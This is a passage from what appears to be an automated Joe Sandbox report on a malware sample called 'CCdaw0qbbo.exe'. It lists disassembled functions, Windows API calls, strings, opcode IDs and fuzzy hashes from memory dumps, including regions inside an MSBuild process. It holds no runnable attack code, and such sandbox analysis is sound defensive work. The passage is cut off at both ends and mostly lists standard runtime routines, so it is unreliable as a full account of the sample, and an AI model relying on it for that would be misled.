                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: 223d9e679b7817e6f703afdf0dda5561b2ce93192b000ac9f2817c3068dda260
                        • Instruction ID: 0b306d8208fba220a12b04c11f40657c7bfdcfe155bacd71df04191b83b8335d
                        • Opcode Fuzzy Hash: 223d9e679b7817e6f703afdf0dda5561b2ce93192b000ac9f2817c3068dda260
                        • Instruction Fuzzy Hash: 71B1597180020AEFCF55CFF4C98099EBBB9FF0A314B10499AE8546B219D776DA51CFA1
                        Function 6E367AB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 6E367AE7
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6E367AEF
                        • _ValidateLocalCookies.LIBCMT ref: 6E367B78
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6E367BA3
                        • _ValidateLocalCookies.LIBCMT ref: 6E367BF8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 2c4e03dfccf4ff2d83dfddee6de79def6d80784a71d9da4fc07de52e6c3030c7
                        • Instruction ID: deb8441fca032205c8bcbf0a034cb68b125818709ed7d52442c2abe7760e072e
                        • Opcode Fuzzy Hash: 2c4e03dfccf4ff2d83dfddee6de79def6d80784a71d9da4fc07de52e6c3030c7
                        • Instruction Fuzzy Hash: 5B41A434A10109ABCF00CFB9C884ADEBBB9AF46328F908555E8145B3D9D772DA11CF91
                        Function 6E36C97A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,6E36CA89,00000000,6E36A290,00000000,00000000,00000001,?,6E36CC02,00000022,FlsSetValue,6E374CD8,6E374CE0,00000000), ref: 6E36CA3B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: 64016e69150968d6394f7afc7bc9403d7ec61eac06d1077461b30f6fe38a5988
                        • Instruction ID: a2e53366f6b044b410f61c8cd84c7b9e0b7bed26b8f31453155970cfff18b741
                        • Opcode Fuzzy Hash: 64016e69150968d6394f7afc7bc9403d7ec61eac06d1077461b30f6fe38a5988
                        • Instruction Fuzzy Hash: BF213632A11631ABDF21DAF5CC44A4A777CAB433A4F210115ED16AF288EB32E900C6E4
                        Function 6E36805C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000001,?,6E367C91,6E366DB0,6E3667C9,?,6E366A01,?,00000001,?,?,00000001,?,6E378AD8,0000000C,6E366AFA), ref: 6E36806A
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E368078
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E368091
                        • SetLastError.KERNEL32(00000000,6E366A01,?,00000001,?,?,00000001,?,6E378AD8,0000000C,6E366AFA,?,00000001,?), ref: 6E3680E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 2caecf36d2023440a92850b3466b5cab49b25b6f1dfd08a00976eca79caad79f
                        • Instruction ID: a793229bf772d262319e4094ecee378a82c203b0fc6e6378b19017264e2b9cc6
                        • Opcode Fuzzy Hash: 2caecf36d2023440a92850b3466b5cab49b25b6f1dfd08a00976eca79caad79f
                        • Instruction Fuzzy Hash: 0201D43311EA267EAE5029F46C99987275CFB0B7797310A79E110550DCFF534840D354
                        Function 6E36BBAE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                        Download Yara Rule
                        Strings
                        • C:\Users\user\Desktop\CCdaw0qbbo.exe, xrefs: 6E36BBCA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: C:\Users\user\Desktop\CCdaw0qbbo.exe
                        • API String ID: 0-1459332469
                        • Opcode ID: ccc032aab6416c7a02dd99d89e3790a23c549a75e3e56239a21c79ab3fa9a3d4
                        • Instruction ID: 766be928fd50965acc4838b2d8f3ca9faaa7c4db8c613ed8fda7038282f25d89
                        • Opcode Fuzzy Hash: ccc032aab6416c7a02dd99d89e3790a23c549a75e3e56239a21c79ab3fa9a3d4
                        • Instruction Fuzzy Hash: 15219D31214609AF9B009FF68884D9B77ADAF013687104928F9998F15CEB32E920CFA0
                        Function 6E369BBE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2D919A8C,00000000,?,00000000,6E3724C2,000000FF,?,6E369B58,?,?,6E369B2C,?), ref: 6E369BF3
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E369C05
                        • FreeLibrary.KERNEL32(00000000,?,00000000,6E3724C2,000000FF,?,6E369B58,?,?,6E369B2C,?), ref: 6E369C27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: fc4fac4c8642bddeec19afaff0907d01faf3b7ec2356d29e6fc88210151d6d65
                        • Instruction ID: add317f8b8bd25f8e5c7acc8c58b74bfd52094de15e0b776bc3f03d361a87ac9
                        • Opcode Fuzzy Hash: fc4fac4c8642bddeec19afaff0907d01faf3b7ec2356d29e6fc88210151d6d65
                        • Instruction Fuzzy Hash: 0001A231904A2AEFDF118FA0CC08BAEBBFDFB04710F004529E822A2790DB799840CA54
                        Function 6E36E635 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                        Download Yara Rule
                        APIs
                        • __alloca_probe_16.LIBCMT ref: 6E36E6BA
                        • __alloca_probe_16.LIBCMT ref: 6E36E783
                        • __freea.LIBCMT ref: 6E36E7EA
                          • Part of subcall function 6E36D7DA: HeapAlloc.KERNEL32(00000000,6E36C127,6E36D4F4,?,6E36C127,00000220,?,?,6E36D4F4), ref: 6E36D80C
                        • __freea.LIBCMT ref: 6E36E7FD
                        • __freea.LIBCMT ref: 6E36E80A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocHeap
                        • String ID:
                        • API String ID: 1096550386-0
                        • Opcode ID: 93728454af45e999451feb7978b4a92c047028e5327b96f6768170dc7432c76b
                        • Instruction ID: 1db042ef59a40835067a6963d432aa8d9f38ab3e293a2471d0a6451156bf70d4
                        • Opcode Fuzzy Hash: 93728454af45e999451feb7978b4a92c047028e5327b96f6768170dc7432c76b
                        • Instruction Fuzzy Hash: BA51C172600306AFEB108EF6CC84EFB3BADEF85714B150528FC149B158EB32DE148660
                        Function 6E368632 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E3685E3,00000000,?,00000001,?,?,?,6E3686D2,00000001,FlsFree,6E3743B0,FlsFree), ref: 6E36863F
                        • GetLastError.KERNEL32(?,6E3685E3,00000000,?,00000001,?,?,?,6E3686D2,00000001,FlsFree,6E3743B0,FlsFree,00000000,?,6E368131), ref: 6E368649
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E368671
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 91ec64371e94539c41e5e30cd308530e09e84ee0468be74548a00252d5e9007e
                        • Instruction ID: e6a4b7fbe92227ae9e741654213659cdbf628969563a0e62337ecbb0b4f876ce
                        • Opcode Fuzzy Hash: 91ec64371e94539c41e5e30cd308530e09e84ee0468be74548a00252d5e9007e
                        • Instruction Fuzzy Hash: 0EE04F30284204B7EF501AF1EC0DB493F6DAB02B58F204060FA4EA84D5E776E810D9D9
                        Function 6E36ED42 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleOutputCP.KERNEL32(2D919A8C,00000000,00000000,?), ref: 6E36EDA5
                          • Part of subcall function 6E36C77C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E36E7E0,?,00000000,-00000008), ref: 6E36C7DD
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E36EFF7
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E36F03D
                        • GetLastError.KERNEL32 ref: 6E36F0E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: fcb57f9d2c15865512da83788cc784dc3c3341ffcb9478a509e5119cb876ccf8
                        • Instruction ID: bb52faaaf6a155f959a3889d2380d569fe1b088b6b299f14f77ee22a30c4fda0
                        • Opcode Fuzzy Hash: fcb57f9d2c15865512da83788cc784dc3c3341ffcb9478a509e5119cb876ccf8
                        • Instruction Fuzzy Hash: A8D189B5D04659AFCF00CFE8C880AEDBBB8FF49304F24456AE466EB255E731A945CB50
                        Function 6E3687B3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 2b58dbac28ecb5498432aef3efddd41943748ab0d366e903f7f76f3bc5ec5f40
                        • Instruction ID: 39fdbfdcb391ec7873ed448951b99dc90b920928a270da2acffdf98ccc4fc4a4
                        • Opcode Fuzzy Hash: 2b58dbac28ecb5498432aef3efddd41943748ab0d366e903f7f76f3bc5ec5f40
                        • Instruction Fuzzy Hash: D051DE72904603EFEB158FF4D850BBA77B8FF4A314F104929E95567298E732E880CB91
                        Function 6E36B3C8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 6E36C77C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E36E7E0,?,00000000,-00000008), ref: 6E36C7DD
                        • GetLastError.KERNEL32 ref: 6E36B42C
                        • __dosmaperr.LIBCMT ref: 6E36B433
                        • GetLastError.KERNEL32(?,?,?,?), ref: 6E36B46D
                        • __dosmaperr.LIBCMT ref: 6E36B474
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: aee1535ed7e042086e29067742a7c05eae9aff0c97b6adbe9e571ff9c49b8992
                        • Instruction ID: f7fa58724f4a006989d66fe56d0e24fc9986aa2d1952d44d6590ea5d10a15d36
                        • Opcode Fuzzy Hash: aee1535ed7e042086e29067742a7c05eae9aff0c97b6adbe9e571ff9c49b8992
                        • Instruction Fuzzy Hash: 7421BE31614615AF9B119FF6C88499AB7BDFF453687108929F8598F24CDB32EC10CFA0
                        Function 6E36C81F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 6E36C827
                          • Part of subcall function 6E36C77C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E36E7E0,?,00000000,-00000008), ref: 6E36C7DD
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E36C85F
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E36C87F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: 82dd49e216416b559420f4647cb80235e122cd546ecad481cc87e97607a1ddca
                        • Instruction ID: edbc09ac73a54ed48d64c43036ba65e717f65d072c3fe00fa55468bbba352e19
                        • Opcode Fuzzy Hash: 82dd49e216416b559420f4647cb80235e122cd546ecad481cc87e97607a1ddca
                        • Instruction Fuzzy Hash: 6D11C4B1505919BEAE1127F64C8CCFF7FACDE4B2997110825F841DD148EB32DD018575
                        Function 6E3706B6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E36FE76,00000000,00000001,00000000,?,?,6E36F134,?,00000000,00000000), ref: 6E3706CD
                        • GetLastError.KERNEL32(?,6E36FE76,00000000,00000001,00000000,?,?,6E36F134,?,00000000,00000000,?,?,?,6E36F6D7,00000000), ref: 6E3706D9
                          • Part of subcall function 6E37069F: CloseHandle.KERNEL32(FFFFFFFE,6E3706E9,?,6E36FE76,00000000,00000001,00000000,?,?,6E36F134,?,00000000,00000000,?,?), ref: 6E3706AF
                        • ___initconout.LIBCMT ref: 6E3706E9
                          • Part of subcall function 6E370661: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E370690,6E36FE63,?,?,6E36F134,?,00000000,00000000,?), ref: 6E370674
                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E36FE76,00000000,00000001,00000000,?,?,6E36F134,?,00000000,00000000,?), ref: 6E3706FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: 5bdf40cd2bb480576f9585605b1776ff719dfda662b29e87bf3973784b34cac6
                        • Instruction ID: bede9bdc46a17dc3e4664764ceedcd9ba09d0c16f1707a157ac98cf37ec79380
                        • Opcode Fuzzy Hash: 5bdf40cd2bb480576f9585605b1776ff719dfda662b29e87bf3973784b34cac6
                        • Instruction Fuzzy Hash: FFF01536500568BBCF221FE1CC18ACA7F6AFB4A3A1B554050FA5985120E7338C20EF98
                        Function 6E368DAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • EncodePointer.KERNEL32(00000000,?), ref: 6E368DD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: f57f93fe577e48f8794bb4540f5bc5c5c118add3f0cd9f5576745883310174e1
                        • Instruction ID: f74f01da4672e0252195c6824c09f0b68a038e37da66e08db567a461301d9b32
                        • Opcode Fuzzy Hash: f57f93fe577e48f8794bb4540f5bc5c5c118add3f0cd9f5576745883310174e1
                        • Instruction Fuzzy Hash: 0B413772900209EFDF05CFE4CC80AEEBBB5BF8A308F148499E91467259D3769961DB51
                        Function 6E366790 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E366B34
                        • ___raise_securityfailure.LIBCMT ref: 6E366C1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: Mz5n
                        • API String ID: 3761405300-426196115
                        • Opcode ID: 0a5fe5464456dada4aa361d96ca767fea6706727632419a3a483f2191d6a636a
                        • Instruction ID: c101e1d7b9aba8fd6a934aa9770bf3171e3046eace15fa93e1ce4560580d7fc1
                        • Opcode Fuzzy Hash: 0a5fe5464456dada4aa361d96ca767fea6706727632419a3a483f2191d6a636a
                        • Instruction Fuzzy Hash: 952123B5525A00EFDF10CF25D185B447BACBF0A361F70806AE90ACB380F3B29584CBA4

                        Executed Functions

                        Function 0676CD78 Relevance: 8.3, Strings: 6, Instructions: 797COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq$(oq$0oNp$DqNp$LjNp
                        • API String ID: 0-2217272392
                        • Opcode ID: a4de1db361c93166c6d227884d2d93c620b574006863d767cb7e990ce994cd05
                        • Instruction ID: 7f789099eeb7586bf0eb34e9bb415b42b2f9643173f4479ab51d05be46b46127
                        • Opcode Fuzzy Hash: a4de1db361c93166c6d227884d2d93c620b574006863d767cb7e990ce994cd05
                        • Instruction Fuzzy Hash: 75623A35B102189FCB54DF69D898AADBBF6EF89310F148469E905DB365CB31EC42CB90
                        Function 0673C580 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq
                        • API String ID: 0-2183774854
                        • Opcode ID: ca3c1265f741ee5e25967cf4e04e5bf8928cf74e9200f3f824152cc1a3146a76
                        • Instruction ID: 0df366a6172602b21383555022fc07eec133a59c7f6d627e2a8a4e217649c3b0
                        • Opcode Fuzzy Hash: ca3c1265f741ee5e25967cf4e04e5bf8928cf74e9200f3f824152cc1a3146a76
                        • Instruction Fuzzy Hash: 5632BC75E002248FDB55DF68C454AAEBBF2EF89310F1580A9E805BB346DB35ED41CBA1
                        Function 01014418 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: \Vl
                        • API String ID: 0-682378881
                        • Opcode ID: 6f92f0570d94b0500647ffd3d985b14d88a14812855b5a221d241b2d7a58191c
                        • Instruction ID: 67ba2283ae3578c497848e1bd9805a5aa7ef1fdac53e96a97f91afc05f9757b7
                        • Opcode Fuzzy Hash: 6f92f0570d94b0500647ffd3d985b14d88a14812855b5a221d241b2d7a58191c
                        • Instruction Fuzzy Hash: 06B15270E00209CFDB50CFA9C9857DDBBF2BF88314F148569D455E72A8EB789845CB81
                        Function 067367F4 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq
                        • API String ID: 0-2183774854
                        • Opcode ID: e01c133bb3b2ca19157a3677af1fb1608c3ff0ce53eb7c7447513222763a7971
                        • Instruction ID: 9c6845bdfa5e3b05b061713056333368a518b82dc1ca2e5787b8b2756c807a80
                        • Opcode Fuzzy Hash: e01c133bb3b2ca19157a3677af1fb1608c3ff0ce53eb7c7447513222763a7971
